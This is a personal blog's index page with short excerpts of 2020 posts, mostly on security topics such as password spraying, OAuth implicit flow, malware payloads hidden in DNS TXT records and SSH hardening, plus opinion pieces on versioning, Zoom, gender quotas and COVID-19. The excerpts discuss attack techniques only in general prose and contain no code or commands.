-
Credential Stuffing vs Password Spraying
29. October 2020
At my employer we use Office 365. I’m not an Microsoft advocate. My friends and colleagues rather know me as Apple-Fanboy and BSD-Geek. But I have to admit that Office 365 works good enough. Even in these pandemic times when we work from home Teams and such serves very well. As part of our security team we also encounter attacks against our user accounts. Maybe you read about that in the press: There are credential stuffing and password spray attacks going on this year against Office 365 accounts.…more
-
AuthN vs AuthZ
23. October 2020
When you do some “login stuff” nowadays you may stumbled upon the terms AuthN and AuthZ. Maybe you wondered what these “N” and “Z” means? Short answer: AuthN stands for Authentication, and AuthZ stands for Authorization. That’s easy right? We’re done for this blog post 🙃 Authentication vs. Authorization But what is the difference of these two terms? Is it not the same? Short answer: No, it isn’t!…more
-
OAuth 2.0 Implicit Flow Considered Harmful
8. October 2020
Certainly I’m not the only one writing into the web that OAuth 2.0 Implicit Flow is bad for security reasons and deprecated by OAuth 2.0 Best Current Practices and OAuth 2.1. But this can’t be said enough times. So I’ll try my best! This post is a guide for people facing situations where random dudes asking “Why should I bother? See, Microsoft is recommending it!” After reading this post you can tell them why it is a bad idea to use implicit flow.…more
-
Improve Your Documentation With Russian Roulette
21. September 2020
As software dudes we write documentation. Of course we do. Most of the time we write some API docs (JavaDoc or such) in the source code. This is not a big deal in my opinion. You do this as well as writing code and tests. Also you review this regularly within the normal code reviews. Yeah, code reviews are something normal in my world! But some times we’re urged to write some documentation outside of the source code.…more
-
Hide and Seek in TXT Records
18. September 2020
Did you ever wondered how the “bad guys” cover things? Some time ago John Ferrell wrote about how to hide malicious code in files looking like a good old plain text log file. Last month (August 2020) John Hammond wrote a part two. In this part he’s showing how they download additional payloads from the internet under the radar. It’s quite simple, if you know. What’s the Problem with Payloads So if you are writing malware you face the same problem as any software developer: You want to ship updates.…more
-
Frauenquote
29. May 2020
Disclaimer: Ich bin ein Mann und eigentlich sollten wir Männer bei diesem Thema gepflegt die Fresse halten, weil wir nicht betroffen sind! Warum schreibe ich jetzt trotzdem etwas dazu? Letztens hat mein Arbeitskollege Stefan Rauch über das Thema Frauenquote geschrieben. Woraufhin ich kommentierte dass es meiner Meinung nach nur mit Quote gehen wird: Leider funktioniert es nur mit Quote. Das zeigt ja schon alleine wie wenig sich in den letzten Jahrzehnten getan hat.…more
MiscellaneousQuoteFrauenquoteDiversitätGleichberechtigungEmanzipationFeminismus
-
Please Use Semantic Versioning
22. May 2020
TL;DR Please use Semantic Versioning and please use it right! This is a little rant about tools, libs and frameworks not using Semantic Versioning. This morning I was triggered on Twitter by the announcement of Terraform version 0.13. My first thought was: WTF! Why are you still at 0.x with a software widely used in production? Disclaimer: I use Terraform by my self and I like it. Scrolling through my time line I saw various other announcements like 0.…more
-
My Opinion on Zoom
15. May 2020
TL;DR: Do not use Zoom at all! If you have to: Use it on iOS or in the browser. Nowadays we use lots of video conferencing to practice physical distancing. A major player in the field is Zoom. One reason for that is the fact that they have a good software quality. At least on the surface it looks like they have. Because the inner software quality seems not that good.…more
-
Hardening Your SSHd With Ansible
8. May 2020
Disclaimer: This is not a beginner tutorial. You should have a brief understanding and some experiences with Linux and Ansible. Whenever you run a server in the wild wild web you should harden your SSHd setup. If you wonder why you should do that, then spin up a machine with enabled SSHd and watch the logs: Usually it takes only few minutes until the first scans and brute force attacks showing up in the logs.…more
-
It Is Not Just the Flu
30. April 2020
There are lot of opinions out there about SARS-CoV2 (aka. Corona). Lots of them stating that COVID-19 (the disease of a SARS-CoV2 infection) is not more than just the good ol’ flu. But this opinion is BS! Although I’m more a technical guy interested in computer stuff and security I feel the urge to say some words about this topic to provide an opposite pole. Because this ill-informed opinion SARS-CoV2 is just like the flu threatens the security of the health of my family, friends and me!…more